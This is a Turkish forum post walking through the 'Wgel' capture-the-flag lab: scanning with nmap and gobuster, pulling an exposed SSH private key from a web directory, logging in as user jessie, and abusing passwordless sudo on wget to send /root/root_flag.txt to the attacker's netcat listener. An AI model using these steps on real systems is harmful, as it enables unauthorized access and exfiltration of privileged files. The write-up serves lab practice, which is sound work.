Selamlar Değerli TURKHACKTEAM kullanıcıları
Bu konumda yine başka bir ctf ile karşınızdayım
Hemen çözümüne başlayalım
Wgel CTF
İlk önce openvpn ile bağlantı sağlıyoruz.
Ve ip adresimiz geldi şimdi bir nmap taraması yapıyorum.
Kod:
nmap -A - T5 <hedef ip>
Şimdi ise gobuster ile dizin taraması yapalım
tabi siz dirb veya dirbbuster da kullanabilirsiniz size kalmış.
Şimdi ise bulduğum dizinlere tek tek bakıyorum ve
işe yarar bir sonuç alamıyorum bir dizin hariç /sitemap dizini
Bu dizinin altında yer alan dizinleri taramak için bir önceki
yaptığımız sorgudaki komutun -u url adresinin sonuna /sitemap yazıyorum.
Gelen dizinlerin hepsini kontrol ettim ve /.ssh dizininde önemli bir şey buldum
burada id.rsa adlı anahtar var login için kullanabilirim indiriyorum.
Fakat bunu kullanabilmek için bize username gerekli
biraz araştırdıktan sonra site kaynak kodlarına bakıyorum.
Buradan da gördüğünüz üzere kullanıcı adımız jessie
Şimdi ise anahtarımıza yetki verip
Şöyle bir bağlantı yapmaya çalışıyorum.
Kod:
chmod 600 id_rsa
Kod:
ssh -i id_rsa jessie@<ip adresi>
Evet bağlantımız başarılı
Biraz kurcaladıktan sonra 1.flag i buluyoruz
Şimdi sıra geldi 2. flagi bulmaya
/usr/bin/wget dizininde şifresiz root olabildiğimizi görüyoruz.
Şimdi ise netcat ile kendi makinemizi dinleyeceğiz.
Ben 1222 portunu kullandım siz farklı bir portta kullanabilirsiniz
Kod:
nc -lvnp 1222ilk netcat i çalıştırın
sonra
Kod:
sudo /usr/bin/wget -post-file=/root/root_flag.txt <kendi ip niz> <dinlenecek port>
Bağlantı başarılı şimdi ise netcat çıktımıza bakalım.
Ve 2.flag i de bulduk
Buraya kadar okuduysanız çok teşekkürler
umarım faydalı bir çözüm olmuştur
Bir sonraki konumda görüşmek üzere...
